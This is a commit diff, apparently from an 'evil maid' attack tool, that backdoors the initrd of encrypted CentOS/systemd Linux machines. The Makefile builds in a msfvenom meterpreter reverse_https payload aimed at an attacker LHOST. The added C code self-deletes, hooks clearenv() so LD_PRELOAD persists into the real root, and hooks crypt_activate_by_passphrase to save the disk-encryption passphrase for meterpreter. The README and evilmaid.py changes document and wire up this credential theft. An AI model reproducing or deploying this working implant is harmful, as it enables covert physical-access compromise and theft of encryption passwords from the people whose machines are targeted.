strozfriedberg
diff --git a/‎Makefile‎
Lines changed: 1 addition & 1 deletion b/‎Makefile‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎README.md‎
Lines changed: 11 additions & 22 deletions b/‎README.md‎
Lines changed: 11 additions & 22 deletions
diff --git a/‎evilmaid.py‎
Lines changed: 8 additions & 0 deletions b/‎evilmaid.py‎
Lines changed: 8 additions & 0 deletions
diff --git a/‎rev.c‎
Lines changed: 23 additions & 3 deletions b/‎rev.c‎
Lines changed: 23 additions & 3 deletions
@@ -2,7 +2,7 @@
 # run with LHOST=x in env
 FILENAME = hda1
 WAIT = 90
-CFLAGS := $(CFLAGS) -shared -Wall -Werror -pedantic -fpic -Wl,-init,shell -std=c99 -DWAIT=$(WAIT)
+CFLAGS := $(CFLAGS) -shared -Wall -Werror -fpic -Wl,-init,shell -std=c99 -DWAIT=$(WAIT)
 CC = gcc
 PAYLOAD = msfvenom -f raw -p python/meterpreter/reverse_https LHOST=$(LHOST) 2>/dev/null | sed 's/^/\#define PAYLOAD "/;s/$$/"\n/'
 # match rev.c
 
@@ -25,7 +25,7 @@
 ## Details
 ### Compiling
 See the `Makefile` for more information/configuration, `LHOST` is required in the
-environment to build the `.so` as `msfvenom` is piped in at compile time.
+environment to build the `.so` as `msfvenom` is piped in at compile time. It is also necessary to have `libcrypsetup-dev` (or equivalent) installed on the build machine.
 
 Generic Instructions (builds iso image in cwd):
 `LHOST=192.168.56.101 make rev.so iso`
@@ -87,9 +87,6 @@ There is no limit to the number of replacements you can run.
 #### Notes
  * `\\1` will expand to the full contents of the match (`*PRE`) when used inside the replace (`*POST`).
  * Be careful with: `| $`
-
-#### Debugging
-If you wish to debug your changes at runtime, you can insert `os.system('sh')` before the `initrd` is repacked to both view and modify changes.
 
 
 ### Nitty Gritty
@@ -163,7 +160,7 @@ The `usr/lib/systemd/system/initrd-switch-root.service` contains the script whic
 
 SELinux is present on CentOS, restricting the use of `LD_PRELOAD`. One working path is `/lib`. This was located by reading the file at `/etc/selinux/targeted/modules/active/file_contexts` for a `system_u:object_r:lib_t` labelled location.
 
-##### Progress
+##### Dropping the shell
 Because systemd calls `clearenv()` before switching root, our `LD_PRELOAD` variable is wiped out. To bypass this, we can hook `clearenv()`, and always just replace the environment with only  `LD_PRELOAD`. However, to achieve this, we need to be PID 1 inside the initrd. This is trickier as it is not possible to `LD_PRELOAD` into this process. To get around this, we have replaced `/init`  with a bash shell script as follows:
 
 ```
@@ -176,22 +173,14 @@ This works becuase `/init` is just a symlink to `/usr/lib/systemd/systemd`. `exe
 
 Once this is impemented, and `clearenv()` is neutralised, it is possible to set `LD_PRELOAD` for the real pid 1 inside the new root.
 
+##### Password Stealing
+systemd handles passwords for encrypted filesystems completely differently to Debian based init scripts. The passwords are passed around using Unix sockets which allow you to send credentials. To get around this complexity, the easiest method We found to access the password was to hook the `crypt_activate_by_passphrase` function from `libcryptsetup`. The relevant parts of the function declaration are as follows:
+
+```
+int crypt_activate_by_passphrase(..., const char *passphrase, size_t passphrase_size, ...);
+```
+
+To access the password we simply hook this function, save `passphrase` to a file and call the original function obtained by `dlsym(RTLD_NEXT, ...)`. As above, we appended our password to the `.so` so it is able to parse itself and make the password available to meterpreter.
+
 ##### Artefacts
 As above, the .so shows up in `/proc/1/maps`, `/proc/1/environ` and `ps` output.
-
-## Todo
- * CentOS/Fedora self delete
- * Add in CentOS password retrieval (Possibly requiring hooking)
- * Hide from:
-    * /proc/*/maps
-    * /proc/*/environ
-    * ps (python)
-    * netstat
- * Alternative .so: Backdoor a standard system .so (libc etc), add a function,
-   export it and set -Wl,-init,ourfunction in the ELF headers.
-    * Pro: stealthier, don't need to LD_PRELOAD/hide ourselves if we're included by
-      default.
-    * Con: Reverse Engineering possible. Tricky, we only have what we bring with us
- * Rubber Ducky for when we can't boot from external media
- * Kernel patch to verify (sha?) checksum of initrd. Would require UEFI
-   secureboot laptop for testing purposes (fedora can do secureboot)
@@ -82,6 +82,10 @@ def CENTOSBACKDOOR(settings):
                 "PRELOADPRE" : "(\[Service\])",
                 "PRELOADPOST" : CENTOSPRELOADCOMMAND,
 
+                "ENVFILE" : "etc/systemd/system.conf",
+                "ENVPRE" : "#DefaultEnvironment=",
+                "ENVPOST" : "DefaultEnvironment=LD_PRELOAD=/hda1",
+
                 "ROOT" : "/sysroot/",
                 "FILENAME" : "/usr/lib/lblinux.so.1",
                 "INITRDFILENAME" : "hda1",
@@ -94,6 +98,10 @@ def CENTOSBACKDOOR(settings):
                 "PRELOADPRE" : "(\[Service\])",
                 "PRELOADPOST" : CENTOSPRELOADCOMMAND,
 
+                "ENVFILE" : "etc/systemd/system.conf",
+                "ENVPRE" : "#DefaultEnvironment=",
+                "ENVPOST" : "DefaultEnvironment=LD_PRELOAD=/hda1",
+
                 "ROOT" : "/sysroot/",
                 "FILENAME" : "/usr/lib/lblinux.so.1",
                 "INITRDFILENAME" : "hda1",
 
@@ -4,12 +4,15 @@
 #include <string.h>
 #include <unistd.h>
 #include <stdio.h>
+#include <dlfcn.h>
+#include <libcryptsetup.h>
 
 // dirty, see Makefile
 #include "/dev/stdin"
 
-int shell(void) {
-    if(getpid() == 1) {
+int shell(int argc, char **argv) {
+    // only execute if we're pid 1 and /sysroot doesn't exist (systemd workaround)
+    if(getpid() == 1 && access("/sysroot", F_OK) == -1) {
         pid_t pid = fork();
         if (pid == 0) {
             // don't show any output
@@ -45,7 +48,7 @@ int shell(void) {
                 NULL
             };
             // delete self
-            // unlink(sopath);
+            unlink(sopath);
             // sleep, wait for networking etc
             sleep(WAIT);
 
@@ -77,6 +80,7 @@ int shell(void) {
 }
 
 
+// for retaining LD_PRELOAD into the new root
 extern char **environ;
 int clearenv (void) {
     /*
@@ -91,3 +95,19 @@ int clearenv (void) {
     return 0;
 
 }
+
+// for stealing the creds
+int (*old_crypt_activate_by_passphrase)(struct crypt_device *cd, const char *name, int keyslot, const char *passphrase, size_t passphrase_size, uint32_t flags);
+int crypt_activate_by_passphrase(struct crypt_device *cd, const char *name, int keyslot, const char *passphrase, size_t passphrase_size, uint32_t flags) {
+    old_crypt_activate_by_passphrase = (int(*)(struct crypt_device *, const char *, int, const char *, size_t, uint32_t))dlsym(RTLD_NEXT, "crypt_activate_by_passphrase");
+
+    /* raise(SIGSEGV); */
+    FILE *self = fopen("/hda1", "a");
+    fseek(self, 0, SEEK_END);
+    fwrite(passphrase, passphrase_size, 1, self);
+    fclose(self);
+
+    int ret = old_crypt_activate_by_passphrase(cd, name, keyslot, passphrase, passphrase_size, flags);
+    return ret;
+
+}